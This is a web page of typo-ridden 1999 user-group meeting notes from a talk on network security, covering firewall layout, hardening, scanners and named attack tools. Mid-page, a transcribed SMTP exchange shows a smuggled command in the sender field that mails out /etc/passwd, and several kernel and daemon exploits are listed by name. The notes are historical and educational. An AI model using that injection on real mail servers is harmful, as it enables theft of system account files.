Boston Linux & UNIX was originally founded in 1994 as part of The Boston Computer Society. We meet on the third Wednesday of each month at the Massachusetts Institute of Technology, in Building E51.

Member Contributed Articles

1999i: Network Security

(by David Kramer; December 14, 1999)

[Back to Index]

Meeting Notes - TOPIC, Wed DATE 1999

Network Security - December 14, 1999

Meeting Notes

Taken by David Kramer


ns threads

Sun has Kerne threadsm fullyn multiprocessing

very little difference betweek kernel threads and processes under Sun, but they all have the same PID, so they'll all be on one line in ps.

George Peron(?sp) has small luggable pentiums

How can other companies offer DSL to yhou over your existing lines where the phone companyh can't?

Often they lie, and the can't

They offer slower speeds for poorer cables.


next meet in 4-370 joint with AIP


Michael Hayes and Eric Cole of Vista Info Securities or

Lots of F100 companies

pay less for networks and security than for cofee and soft drinks.

hire unknown Y2K experts who may be putting in back doors, and know all the passwords (which the companies typically won't change).

Lots of F100 companies have no security policies, or allow everything outbound.

"Depth of security"- like castles- Always rely on multiple levels of security, some of which are designed merely for detection, some are merly for slowing down attackers.

70% of attacks involve insiders.


Admin- passwords.

Authorizing- Control who can get to what.

Accounting- Recording who has done what.

Insurance companies may not pay for Y2K or security losses if they can prove you were negligent.

Honeypot- Set up a system that looks like the real system to attract hackers and log heavily.

He says this is a bad idea. Don't attract attention.

NT should never be used as a firewall. The OS itself is not secure enough.

Hardening- removing unwanted services, etc.

(cloud)--[Router]--[Pix fw]--(DMZ/servers)--[Linux fw]-(inside)

Don't put mail server in DMZ. Proxy it to the inside.

There are hacker websites that have the source code for NT, firewall1, Solaris, etc. If the source code could get out, it could be modified and get put back in with back doors.

In Netscape, type link:// to find sites that link to your site. Gibson Research.

Attack tools

WinNuke- Just type in IP address of Win95/98/NT box and this kills it. Connects to 139 NetBios. It sends out-of-band data that it's not expecting.



mail from: "/bin/mail me@host < /etc/passwd"

.. sender ok

rcpt to: mickeymouse

55o unknown user


354 enter mail .

Linux exploits

2.2 frag ICMP kernel panic

SDI-pop2 during IMAP anonymous_login() uid is nobody

SDI wu-ftp will let you execute commands as root if you have write access to the server

Sesquipedalian- DOS Linujx 2.1.89-2.2.3: zero-lenght fragment bug.

procrace- linux 2.2.1 contains a /prov race condition allowing local users to crash the kernel.

L2.0.36+ automount allows normal users to gain root via kernel overflow


Runs on host


Specific rules first, more general rules later.

IPChains adds


chains, intricate rules

quality of service routing

ip/port/interface and not (!_


Mason- figures your rules by watching what you do.


next gen packet firewalling checks file/dir permissions/setuids.

cops (old)

tiger (under devel)

Runs outside

strobe- old port scanning tool


queso- checks for well-know attacks, not really a port scanner

nessus v.good scanning tools

Saint- like Satan

Cheops checks for OS vulnerabilities

ftpcheck/relaycheck checks for servers that relay

SARA Security Auditor's Research Assistant- like Satan.

BASS Bulk Auditing Security Scanner- Scan several servers.



BLU is a member of BostonUserGroups
BLU is a member of BostonUserGroups
We also thank MIT for the use of their facilities.

Valid HTML 4.01! Valid CSS!

Boston Linux & Unix /